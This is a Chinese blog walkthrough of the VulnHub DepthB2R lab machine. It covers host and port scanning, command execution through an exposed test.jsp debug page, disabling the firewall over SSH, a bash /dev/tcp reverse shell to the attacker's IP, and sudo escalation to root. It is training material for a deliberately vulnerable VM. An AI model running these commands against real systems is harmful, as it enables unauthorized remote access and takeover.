DepthB2R【附代码】(权限提升)

已于 2024-08-05 05:41:37 修改
阅读量176 收藏 3
点赞数 1
分类专栏: 打靶日常 文章标签: 笔记 学习 网络安全 网络 web安全
于 2024-08-05 05:38:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140916398
版权

靶机下载地址:

https://www.vulnhub.com/entry/depth-1,213/icon-default.png?t=N7T8https://www.vulnhub.com/entry/depth-1,213/

1. 主机发现+端口扫描+目录扫描

1.1. 主机发现

nmap -sn 192.168.43.0/24|grep -B 2 '08:00:27:08:B4:07'

1.2. 端口扫描

nmap -p- 192.168.43.112

1.3. 目录扫描

dirb http://192.168.43.112:8080

2. 8080端口

2.1. 打洞寻找漏洞

1.老规矩逐个点击页面功能点,查看可以利用的功能点。 -> 点击manager webapp跳转至一个登录框

2.拼接dirb扫出的目录,不大行 -> 试试dirsearch目录扫描,扫出一个jsp文件,可能是dirb的字典不大行

python3 dirsearch.py -u http://192.168.43.112:8080/

3.拼接/test.jsp,页面是一个debug页面 -> 输入根据页面提示,输入ls -la /home,发现root和bill两个用户

ls -la /home

4.可以执行命令,但是尝试反弹shell失败,看一下进程,发现有ssh,之前没有扫到,可能是因为防火墙 -> 查看/etc下,防火墙是存在的 -> 关闭防火墙

ps aux #查看进程
ls -la /etc #寻找防火墙
ssh bill@localhost sudo ufw disable # 关闭防火墙

2.2. GetShell

1.打开kali监听

nv -lvnp 4444

2.执行反弹shell语句 -> 成功反弹

ssh bill@localhost bash -i >& /dev/tcp/192.168.43.178/4444 0>&1

3. 权限提升

1.查看当前用户权限 -> 发现是all全部

sudo -l

2.直接提权 -> 成功

sudo su

Kucei
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
AXA2R allegro封装
05-06
AXA2R Allegro封装是Panasonic公司推出的一款专门针对SD卡贴片接插件的电子设计自动化(EDA)软件工具。在电子硬件设计中,封装是至关重要的一个环节,它涉及芯片与电路板之间的物理连接,以及信号传输的可靠性。AXA...
实战提升蓝牙芯片的SNR
09-10
DAC PCM1794A 24Bit DAC的设计需要特别注意:I2S数字输入、DAC模拟数字输出、VCC1、VCC2R、VCC2L为DAC模拟供电、AGND1和AGND2和AGND3L为DAC模拟AGND等。 八、结论 本文为读者提供了实战提升蓝牙芯片的SNR设计指导...
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 364
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
vulnhub系列:DepthB2R
jq_j37的博客
08-03 167
vulnhub系列:DepthB2R靶机,打靶文章
智能优化算法:灰狼优化算法-代码
Jack旭的博客
07-31 5万+
智能算法:灰狼优化算法-代码 摘要:受 灰 狼 群 体 捕 食 行 为 的 启 发,Mirjalili等[1]于 2014年提出了一种新型群体智能优化算法:灰狼优化算法。GWO通过模拟灰狼群体捕食行为,基于狼群群体协作的机制来达到优化的目的。 GWO算法具有结构简单、需要调节的参数少,容易实现等特点,其中存在能够自适应调整的收敛因子以及信息反馈机制,能够在局部寻优与全局搜索之间实现平衡,因此在对问题的求解精度和收敛速度方面都有良好的性能。 1.算法原理 灰狼属于犬科动物,被认为是顶级的掠食者,它们处于生物
智能优化算法:鲸鱼优化算法-代码
热门推荐
Jack旭的博客
07-24 6万+
智能算法:鲸鱼优化算法-代码 文章目录智能算法:鲸鱼优化算法-代码1.算法原理1.1包围猎物1.2 狩猎行为1.3 搜索猎物1.4 算法流程2. 算法结果:参考文献: 摘要:鲸鱼优化算法 (whale optimization algorithm,WOA)是 2016 年由澳大利亚格里菲斯大学的Mirjalili 等提出的一种新的群体智能优化算法,其优点在于操作简单,调整的参数少以及跳出局部 最优的能力强。 1.算法原理 鲸鱼优化算法(whale optimization algorithm,WOA)是
智能优化算法:浣熊优化算法-代码
Jack旭的博客
05-07 5220
摘要:浣熊优化算法(Coati Optimization Algorithm(COA)),是于2022年提出的一种基于浣熊行为的优化算法,该算法通过模拟浣熊猎食行为来进行寻优,具有寻优能力强,收敛速度快等特点。
智能优化算法:斑马优化算法-代码
Jack旭的博客
05-08 7092
摘要:斑马优化算法(Zebra Optimization Algorithm(ZOA)),是于2022年提出的一种基于斑马行为的优化算法,该算法通过模拟斑马行为来进行寻优,具有寻优能力强,收敛速度快等特点。
智能优化算法:蚁狮优化算法-代码
Jack旭的博客
08-01 1万+
智能优化算法:蚁狮优化算法-代码 摘要:蚁狮优化(Ant Lion Optimizer,ALO)算法是Mirjalili于2015提出的一种新型元启发式群智能算法[1]。由于引入了随机游走、轮盘赌策略及精英策略,使得 ALO 算法成为一种种群多样、寻优性能强、调节参数少、易于实现的搜索技术。 1.算法原理 ALO 算法核心思想是模拟蚁狮捕猎蚂蚁的狩猎机制以实现全局寻优。蚁狮在捕猎前会在在沙质土中利用其巨大的下颚挖出一个漏斗状的陷阱,并藏在陷阱底部等待猎物到来。一旦随机游走的蚂蚁落入陷阱时,蚁狮迅速将其捕食
智能优化算法:哈里斯鹰算法-代码
Jack旭的博客
09-11 2万+
2019智能优化算法:哈里斯鹰算法-代码 文章目录2019智能优化算法:哈里斯鹰算法-代码1.算法原理1.1 搜索阶段1.2 搜索与开发的转换1.3 开发阶段2.算法结果3.参考文献4.Matlab代码 摘要:2019 年 Heidari 等人提出哈里斯鹰优化算法(Harris Hawk Optimization, HHO),该算法有较强的全局搜索能力,并且需要调节的参数较少的优点。 1.算法原理 哈里斯鹰优化算法是一种模拟哈里斯鹰捕食行为的智能优化算法,主要由 3 部分组成:搜索阶段、搜索与开发
智能优化算法:北方苍鹰优化算法-代码
Jack旭的博客
05-02 1万+
智能优化算法:北方苍鹰优化算法 文章目录智能优化算法:北方苍鹰优化算法1.北方苍鹰优化算法简介2.北方苍鹰优化算法基本原理2.1灵感来源和北方苍鹰的行为2.2算法的数学模型2.2.1 初始化2.2.2 第一阶段:猎物识别(勘探阶段)2.2.3 第二阶段:追逐及逃生(开发阶段)3.实验结果4.参考文献5.Matlab代码 1.北方苍鹰优化算法简介 北方苍鹰优化算法(Northern Goshawk Optimization,NGO)是2022年由MOHAMMAD DEHGHANI等人提出的,该算法模拟了北方苍
进化算法之粒子群算法介绍代码——PSO
樊鴻燁的博客
05-16 4710
粒子群算法PSO背景介绍算法介绍鸟群觅食算法&鸟群 背景介绍 算法介绍   粒子群算法,英文全称为Partricle Swarm Optimization,所以简称为PSO算法,它是基于迭代的进化算法,也就是说下一个结果是基于上一个结果所传递的信息,并更新后的结果。PSO算法是基于鸟群觅食的行为所提出来的算法。所以在了解PSO算法需要了解鸟群是如何觅食的。 鸟群觅食   故事一:   假设有若干个食物分别藏在一片大森林中,此时有一群鸟想要去寻找这些食物,可是他们并不知道食物的具体位置,但是他们
2R机器臂动力学仿真Sinulink
08-07
本工程使用matlab2018b建立,需使用此版本或更高才可打开。二连杆机械臂动力学仿真,使用Simscape Multibody多体工具箱建立连杆模型,控制方法:PD反馈控制,实现无余差跟踪,压缩包含有PD控制原理介绍。
Example_Src.zip_Example_Src_towerk2r
09-21
【标题】"Example_Src.zip_Example_Src_towerk2r" 提供的信息表明,这是一个与编程或软件开发相关的压缩文件,其中包含了名为 "Example_Src" 的源代码库或者项目。"towerk2r" 可能是该项目的一个特定版本或者是...
基于Matlab模拟Alamouti 编码完整代码.zip
01-07
1. "Alamoudi_2T2R.m":这个文件可能是实现双发射双接收(2T2R)Alamouti编码的Matlab脚本,它可能包括了信号的生成、编码、信道模拟以及解码的过程。 2. "Alamoudi_2T1R.m":与上一个文件类似,但可能针对的是双...
【OpenCV C++20 学习笔记】阈值操作—分离图片对象
最新发布
TeamLee的博客
08-04 705
简单介绍了OpenCV中二值化、反二值化等阈值操作的原理和代码实现。
PySide6/PyQT学习笔记(很杂)
m0_56230886的博客
08-04 167
持续更新……
物理笔记-八年级上册
m0_69379426的博客
08-01 285
电学,力学,声学,光学,热学。
(STM32笔记)九、RCC时钟树与时钟 第三部分
一个放笔记的小书架
08-04 549
我用的是正点的STM32F103来进行学习,板子和教程是野火的指南者。之后的这个系列笔记开头未标明的话,用的也是这个板子和教程。
2R机械臂matlab机器人工具箱仿真代码
06-06
以下是一个简单的2R机械臂MATLAB机器人工具箱仿真代码: ```matlab % 定义机器人参数 L1 = 1; % 第一段臂长 L2 = 1; % 第二段臂长 % 定义机器人模型 L(1) = Link([0 L1 0 0],'revolute'); L(2) = Link([0 L2 0 0],'revolute'); robot = SerialLink(L,'name','2R机械臂'); % 定义起始位姿 q = [0 0]; % 绘制机器人姿态 robot.plot(q,'workspace',[-2 2 -2 2 -2 2]); % 定义末端执行器的位姿 T = transl(0.5, 0.5, 0.5); % 计算逆运动学 q = robot.ikine(T,q,[1 1 0 0 0 0]); % 绘制机器人姿态 robot.plot(q,'workspace',[-2 2 -2 2 -2 2]); ``` 这个代码使用了MATLAB机器人工具箱来定义一个2R机械臂模型,绘制了机器人的起始姿态,并计算了机器人实现末端执行器的位姿所需的关节角度。需要注意的是,此代码仅适用于特定的机械臂结构和工作区域。如果需要适用于其他机械臂,请根据具体情况进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值